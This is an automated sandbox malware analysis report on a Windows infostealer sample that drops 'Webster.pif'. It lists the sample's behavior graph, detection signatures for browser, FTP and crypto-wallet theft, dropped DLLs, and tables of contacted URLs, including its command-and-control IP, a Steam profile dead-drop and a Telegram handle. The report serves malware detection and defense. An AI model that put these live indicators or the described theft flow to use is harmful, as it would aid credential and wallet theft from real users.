                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483134 Sample: file.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 36 steamcommunity.com 2->36 38 FGQNrbtYCvA.FGQNrbtYCvA 2->38 40 2 other IPs or domains 2->40 54 Found malware configuration 2->54 56 Antivirus detection for URL or domain 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 6 other signatures 2->60 8 file.exe 60 2->8         started        signatures3 process4 signatures5 62 Found stalling execution ending in API Sleep call 8->62 11 cmd.exe 3 8->11         started        process6 file7 34 C:\Users\user\AppData\Local\...\Webster.pif, PE32 11->34 dropped 64 Drops PE files with a suspicious file extension 11->64 15 Webster.pif 36 11->15         started        20 cmd.exe 2 11->20         started        22 conhost.exe 11->22         started        24 7 other processes 11->24 signatures8 process9 dnsIp10 42 steamcommunity.com 23.197.127.21, 443, 64167 AKAMAI-ASN1EU United States 15->42 44 5.75.212.60, 443, 64168, 64169 HETZNER-ASDE Germany 15->44 26 C:\ProgramData\vcruntime140.dll, PE32 15->26 dropped 28 C:\ProgramData\softokn3.dll, PE32 15->28 dropped 30 C:\ProgramData\nss3.dll, PE32 15->30 dropped 32 3 other files (none is malicious) 15->32 dropped 46 Found many strings related to Crypto-Wallets (likely being stolen) 15->46 48 Tries to harvest and steal ftp login credentials 15->48 50 Tries to harvest and steal browser information (history, passwords, etc) 15->50 52 Tries to steal Crypto Currency Wallets 15->52 file11 signatures12

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe29%ReversingLabsWin32.Trojan.Generic

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\229536\Webster.pif7%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                        https://mozilla.org0/0%URL Reputationsafe
                        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%URL Reputationsafe
                        https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                        https://5.75.212.60/sqls.dll100%Avira URL Cloudmalware
                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%Avira URL Cloudsafe
                        https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        https://5.75.212.60/msvcp140.dllG100%Avira URL Cloudmalware
                        https://5.75.212.60/er100%Avira URL Cloudmalware
                        http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259/badges100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english0%Avira URL Cloudsafe
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english0%Avira URL Cloudsafe
                        https://5.75.212.60/-100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_0%Avira URL Cloudsafe
                        https://5.75.212.60/)100%Avira URL Cloudmalware
                        https://store.steampowered.com/privac0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&amp;l=e0%Avira URL Cloudsafe
                        http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%Avira URL Cloudsafe
                        http://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        https://t.me/armad2a100%Avira URL Cloudmalware
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%Avira URL Cloudsafe
                        https://5.75.212.60/softokn3.dllNm100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%Avira URL Cloudsafe
                        https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                        https://steamcommunity.com/fi0%Avira URL Cloudsafe
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%Avira URL Cloudsafe
                        https://5.75.212.60/df100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
                        https://5.75.212.60/b100%Avira URL Cloudmalware
                        https://5.75.212.60/e100%Avira URL Cloudmalware
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%Avira URL Cloudsafe
                        https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe
                        https://5.75.212.60/Data100%Avira URL Cloudmalware
                        https://store.steampowered.com/about/0%Avira URL Cloudsafe
                        https://t.me/armad2ahellosqls.dllsqlite3.dllIn0%Avira URL Cloudsafe
                        https://help.steampowered.com/en/0%Avira URL Cloudsafe
                        https://5.75.212.60/softokn3.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/market/0%Avira URL Cloudsafe
                        https://store.steampowered.com/news/0%Avira URL Cloudsafe
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                        http://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259/inventory/100%Avira URL Cloudmalware
                        https://5.75.212.60/mozglue.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                        https://store.steampowered.com/stats/0%Avira URL Cloudsafe
                        https://5.75.212.60/100%Avira URL Cloudmalware
                        https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%Avira URL Cloudsafe
                        https://5.75.212.60/msvcp140.dllHA100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a0%Avira URL Cloudsafe
                        https://5.75.212.60/softokn3.dllI100%Avira URL Cloudmalware
                        https://5.75.212.60/freebl3.dll100%Avira URL Cloudmalware
                        https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                        https://5.75.212.60/nss3.dll100%Avira URL Cloudmalware
                        https://store.steampowered.com/legal/0%Avira URL Cloudsafe
                        https://5.75.212.60/ts8100%Avira URL Cloudmalware
                        https://5.75.212.60/msvcp140.dll100%Avira URL Cloudmalware
                        http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
                        https://5.75.212.60/saenh.dllv100%Avira URL Cloudmalware
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        https://store.steampowered.com/0%Avira URL Cloudsafe
                        https://5.75.212.60CBAFIJ0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%Avira URL Cloudsafe
                        https://steamcommunity.com/profiles/76561199747278259:0%Avira URL Cloudsafe
                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        steamcommunity.com
                        		23.197.127.21
                        		truetrue
                          		unknown
                          FGQNrbtYCvA.FGQNrbtYCvA
                          		unknown
                          		unknownfalse
                            		unknown
                            198.187.3.20.in-addr.arpa
                            		unknown
                            		unknownfalse
                              		unknown
                              86.23.85.13.in-addr.arpa
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://5.75.212.60/sqls.dlltrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://steamcommunity.com/profiles/76561199747278259true
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/softokn3.dllfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/mozglue.dllfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/false
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/freebl3.dllfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/nss3.dllfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/msvcp140.dllfalse
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabAEGHJK.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=AEGHJK.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/?subsection=broadcastsWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/msvcp140.dllGWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://store.steampowered.com/subscriber_agreement/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.2091955830.00000000026C6000.00000004.00000020.00020000.00000000.sdmp, Swim.0.dr, Webster.pif.2.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.valvesoftware.com/legal.htmWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/erWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=englishWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=englishWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199747278259/badgesWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/-Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=enWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/privacWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/)Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.autoitscript.com/autoit3/Jfile.exe, 00000000.00000003.2086397836.00000000026CD000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp, Desktops.0.dr, Webster.pif.2.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&amp;l=eWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.mozilla.com/en-US/blocklist/Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://mozilla.org0/Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://t.me/armad2aWebster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://store.steampowered.com/privacy_agreement/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDAAAFB.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/points/shop/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AEGHJK.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0Webster.pif, 0000000B.00000003.2876365347.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B1E000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876421018.0000000001938000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876471328.00000000018B1000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322725102.00000000047F1000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322120004.0000000001B4B000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000003.2876514280.0000000001B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                                • URL Reputation: safe
                                		unknown
                                https://5.75.212.60/softokn3.dllNmWebster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.ecosia.org/newtab/AEGHJK.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKFIJJE.11.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/privacy_agreement/Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Webster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steamcommunity.com/fiWebster.pif, 0000000B.00000002.3321760579.00000000017DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtKFIJJE.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/dfWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://5.75.212.60/eWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://5.75.212.60/bWebster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaWebster.pif, 0000000B.00000002.3321932371.0000000001937000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3322051688.0000000001A73000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321976352.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, DAAAFB.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCWebster.pif, 0000000B.00000002.3322725102.0000000004828000.00000040.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321902683.00000000018B0000.00000004.00000800.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/about/76561199747278259[1].htm.11.drfalse
                                • Avira URL Cloud: safe
                                		unknown
